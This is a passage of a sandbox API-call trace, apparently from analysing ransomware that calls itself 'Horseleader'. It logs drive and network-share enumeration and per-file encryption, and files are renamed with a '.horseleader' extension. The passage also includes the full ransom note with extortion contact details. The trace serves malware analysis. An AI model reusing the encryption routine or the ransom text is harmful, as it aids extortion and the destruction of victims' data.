(in: hHeap=0x780000, dwFlags=0x0, 
lpMem=0x7c9438 | out: hHeap=0x780000) returned 1 [0114.356] SHGetFolderPathW (in: hwnd=0x0, csidl=0, hToken=0x0, dwFlags=0x0, pszPath=0xdf44c8 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0114.356] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb438b7, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x178 [0114.357] GetLogicalDrives () returned 0x4 [0114.357] GetProcessHeap () returned 0x780000 [0114.357] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x248) returned 0x7d1ce8 [0114.381] wnsprintfW (in: pszDest=0x7d1ce8, cchDest=260, pszFmt="\\\\?\\%c:" | out: pszDest="\\\\?\\C:") returned 6 [0114.381] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xb436ea, lpParameter=0x7d1ce8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1d4 [0114.384] WaitForMultipleObjects (nCount=0x2, lpHandles=0x39f08c*=0x178, bWaitAll=1, dwMilliseconds=0xffffffff) Thread: id = 4 os_tid = 0x9e4 Thread: id = 5 os_tid = 0xaa8 Thread: id = 7 os_tid = 0x598 Thread: id = 13 os_tid = 0x5cc [0114.443] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x0, lphEnum=0x305f824 | out: lphEnum=0x305f824*=0x7c6760) returned 0x0 [0126.089] GetProcessHeap () returned 0x780000 [0126.090] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x4040) returned 0x7d7fd8 [0126.092] WNetEnumResourceW (in: hEnum=0x7c6760, lpcCount=0x305f81c, lpBuffer=0x7d7fd8, lpBufferSize=0x305f820 | out: lpcCount=0x305f81c, lpBuffer=0x7d7fd8, lpBufferSize=0x305f820) returned 0x0 [0126.092] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7d7fd8, lphEnum=0x305f7fc | out: lphEnum=0x305f7fc*=0x7a2cf0) returned 0x0 [0126.582] GetProcessHeap () returned 0x780000 [0126.583] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x4040) returned 0x7dc020 [0126.584] WNetEnumResourceW (in: hEnum=0x7a2cf0, lpcCount=0x305f7f4, lpBuffer=0x7dc020, 
lpBufferSize=0x305f7f8 | out: lpcCount=0x305f7f4, lpBuffer=0x7dc020, lpBufferSize=0x305f7f8) returned 0x103 [0126.584] GetProcessHeap () returned 0x780000 [0126.584] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dc020 | out: hHeap=0x780000) returned 1 [0126.584] WNetCloseEnum (hEnum=0x7a2cf0) returned 0x0 [0126.584] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7d7ff8, lphEnum=0x305f7fc | out: lphEnum=0x305f7fc*=0x7a2cf0) returned 0x4b8 [0160.998] WNetOpenEnumW (in: dwScope=0x2, dwType=0x0, dwUsage=0x13, lpNetResource=0x7d8018, lphEnum=0x305f7fc | out: lphEnum=0x305f7fc*=0x7a2cf0) returned 0x4c6 [0161.019] WNetEnumResourceW (in: hEnum=0x7c6760, lpcCount=0x305f81c, lpBuffer=0x7d7fd8, lpBufferSize=0x305f820 | out: lpcCount=0x305f81c, lpBuffer=0x7d7fd8, lpBufferSize=0x305f820) returned 0x103 [0161.019] GetProcessHeap () returned 0x780000 [0161.019] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d7fd8 | out: hHeap=0x780000) returned 1 [0161.019] WNetCloseEnum (hEnum=0x7c6760) returned 0x0 Thread: id = 14 os_tid = 0x700 [0118.402] lstrcmpW (lpString1="\\\\?\\C:", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0118.403] GetProcessHeap () returned 0x780000 [0118.403] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c7d50 [0118.403] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\*") returned 8 [0118.403] FindFirstFileW (in: lpFileName="\\\\?\\C:\\*", lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 0x7c66a0 [0118.403] lstrcmpiW 
(lpString1="$Recycle.Bin", lpString2="Windows") returned -1 [0118.403] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin") returned 19 [0118.404] lstrcmpW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0118.404] lstrcmpW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0118.404] lstrcmpW (lpString1="\\\\?\\C:\\$Recycle.Bin", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0118.404] GetProcessHeap () returned 0x780000 [0118.404] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7c8598 [0118.404] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\*") returned 21 [0118.404] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\*", lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName=".", cAlternateFileName="")) returned 0x7c66e0 [0118.405] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0118.405] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\.") returned 21 [0118.405] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0118.405] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0118.405] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0118.405] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0118.406] lstrlenW (lpString=".testttjffg") returned 11 [0118.406] StrStrW (lpFirst="\\\\?\\C:\\$Recycle.Bin\\.", lpSrch=".testttjffg") returned 0x0 [0118.406] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: 
pbBuffer=0x32af478) returned 1 [0118.408] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0118.408] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\." (normalized: "c:\\$recycle.bin\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.408] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xd29f5adc, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="..", cAlternateFileName="")) returned 1 [0118.408] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0118.408] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\..") returned 22 [0118.408] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0118.409] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0118.409] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0118.409] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0118.409] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0118.409] lstrlenW (lpString=".testttjffg") returned 11 [0118.409] StrStrW (lpFirst="\\\\?\\C:\\$Recycle.Bin\\..", lpSrch=".testttjffg") returned 0x0 [0118.409] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af478 | out: pbBuffer=0x32af478) returned 1 [0118.409] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af478*, pdwDataLen=0x32af534*=0x24, dwBufLen=0x80 | out: 
pbData=0x32af478*, pdwDataLen=0x32af534*=0x80) returned 1 [0118.409] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\.." (normalized: "c:"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.409] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 1 [0118.410] lstrcmpiW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="Windows") returned -1 [0118.410] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000") returned 66 [0118.410] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2=".") returned 1 [0118.410] lstrcmpW (lpString1="S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="..") returned 1 [0118.410] lstrcmpW (lpString1="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0118.410] GetProcessHeap () returned 0x780000 [0118.410] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7b67f0 [0118.410] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*") returned 68 [0118.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\*", 
lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x7c6720 [0118.411] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0118.411] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.") returned 68 [0118.411] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0118.411] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0118.411] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0118.411] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0118.411] lstrlenW (lpString=".testttjffg") returned 11 [0118.411] StrStrW (lpFirst="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.", lpSrch=".testttjffg") returned 0x0 [0118.411] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0118.411] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0118.412] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\." 
(normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.412] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0118.412] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0118.412] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\..") returned 69 [0118.412] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0118.412] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0118.413] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0118.413] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0118.413] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0118.413] lstrlenW (lpString=".testttjffg") returned 11 [0118.413] StrStrW (lpFirst="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\..", lpSrch=".testttjffg") returned 0x0 [0118.413] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0118.413] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0118.413] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\.." 
(normalized: "c:\\$recycle.bin"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0118.414] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0118.414] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0118.414] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 78 [0118.414] StrStrIW (lpFirst="desktop.ini", lpSrch=".horseleader") returned 0x0 [0118.414] lstrcmpW (lpString1="desktop.ini", lpString2="#Decrypt#.txt") returned 1 [0118.414] lstrcmpW (lpString1="desktop.ini", lpString2="_uninstalling_.png") returned 1 [0118.414] lstrlenW (lpString=".testttjffg") returned 11 [0118.414] StrStrW (lpFirst="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini", lpSrch=".testttjffg") returned 0x0 [0118.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32af200 | out: pbBuffer=0x32af200) returned 1 [0118.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x24, dwBufLen=0x80 | out: pbData=0x32af200*, pdwDataLen=0x32af2bc*=0x80) returned 1 [0118.415] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0118.415] lstrlenW (lpString="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini") returned 78 [0118.415] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0118.415] GetFileSizeEx (in: hFile=0x1dc, lpFileSize=0x32af2c0 | out: lpFileSize=0x32af2c0*=129) returned 1 [0118.415] ReadFile (in: hFile=0x1dc, lpBuffer=0x32aa200, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af2e4, lpOverlapped=0x0 | out: lpBuffer=0x32aa200*, lpNumberOfBytesRead=0x32af2e4*=0x81, lpOverlapped=0x0) returned 1 [0118.417] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0xffffff7f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0118.417] WriteFile (in: hFile=0x1dc, lpBuffer=0x32aa200*, nNumberOfBytesToWrite=0x81, lpNumberOfBytesWritten=0x32af2e4, lpOverlapped=0x0 | out: lpBuffer=0x32aa200*, lpNumberOfBytesWritten=0x32af2e4*=0x81, lpOverlapped=0x0) returned 1 [0118.417] SetFilePointerEx (in: hFile=0x1dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0118.418] WriteFile (in: hFile=0x1dc, lpBuffer=0x32af2b8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af2e4, lpOverlapped=0x0 | out: lpBuffer=0x32af2b8*, lpNumberOfBytesWritten=0x32af2e4*=0x4, lpOverlapped=0x0) returned 1 [0118.418] WriteFile (in: hFile=0x1dc, lpBuffer=0x32af200*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af2e4, lpOverlapped=0x0 | out: lpBuffer=0x32af200*, lpNumberOfBytesWritten=0x32af2e4*=0x80, lpOverlapped=0x0) returned 1 [0118.418] CloseHandle (hObject=0x1dc) returned 1 [0118.428] GetProcessHeap () returned 0x780000 [0118.428] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x795d70 [0118.428] wnsprintfW (in: pszDest=0x795d70, cchDest=1024, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.horseleader") returned 90 [0118.428] MoveFileW (lpExistingFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini"), lpNewFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.horseleader" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\desktop.ini.horseleader")) returned 1 [0119.220] GetProcessHeap () returned 0x780000 [0119.220] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x795d70 | out: hHeap=0x780000) returned 1 [0119.220] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2dfdd420, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2dfdd420, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x81, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0119.221] FindClose (in: hFindFile=0x7c6720 | out: hFindFile=0x7c6720) returned 1 [0119.221] wnsprintfW (in: pszDest=0x7b67f0, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\#Decrypt#.txt") returned 80 [0119.221] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\S-1-5-21-3388679973-3930757225-3770151564-1000\\#Decrypt#.txt" (normalized: "c:\\$recycle.bin\\s-1-5-21-3388679973-3930757225-3770151564-1000\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x200 [0119.795] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ 
@Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0119.795] WriteFile (in: hFile=0x200, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af300*=0x5e4, lpOverlapped=0x0) returned 1 [0119.796] lstrlenA (lpString="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") returned 1368 [0119.796] WriteFile (in: hFile=0x200, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af300, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af300*=0x558, lpOverlapped=0x0) returned 1 [0119.797] CloseHandle (hObject=0x200) returned 1 [0119.798] GetProcessHeap () returned 0x780000 [0119.798] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7b67f0 | out: hHeap=0x780000) returned 1 [0119.798] FindNextFileW (in: hFindFile=0x7c66e0, lpFindFileData=0x32af580 | out: lpFindFileData=0x32af580*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x2dfdd420, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb63e4b00, ftLastAccessTime.dwHighDateTime=0x1d337f4, ftLastWriteTime.dwLowDateTime=0xb63e4b00, ftLastWriteTime.dwHighDateTime=0x1d337f4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x650052, dwReserved1=0x790063, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000", cAlternateFileName="S-1-5-~1")) returned 0 [0119.798] FindClose (in: hFindFile=0x7c66e0 | out: hFindFile=0x7c66e0) returned 1 [0119.799] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\$Recycle.Bin\\#Decrypt#.txt") returned 33 [0119.799] CreateFileW (lpFileName="\\\\?\\C:\\$Recycle.Bin\\#Decrypt#.txt" (normalized: "c:\\$recycle.bin\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0121.089] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ 
@Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0121.089] WriteFile (in: hFile=0x158, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af578*=0x5e4, lpOverlapped=0x0) returned 1 [0121.091] lstrlenA (lpString="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") returned 1368 [0121.091] WriteFile (in: hFile=0x158, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af578, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af578*=0x558, lpOverlapped=0x0) returned 1 [0121.091] CloseHandle (hObject=0x158) returned 1 [0121.091] GetProcessHeap () returned 0x780000 [0121.091] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7c8598 | out: hHeap=0x780000) returned 1 [0121.091] FindNextFileW (in: hFindFile=0x7c66a0, lpFindFileData=0x32af7f8 | out: lpFindFileData=0x32af7f8*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac30ebc0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac30ebc0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Boot", cAlternateFileName="")) returned 1 [0121.092] lstrcmpiW (lpString1="Boot", lpString2="Windows") returned -1 [0121.092] wnsprintfW (in: pszDest=0x7c7d50, cchDest=1024, 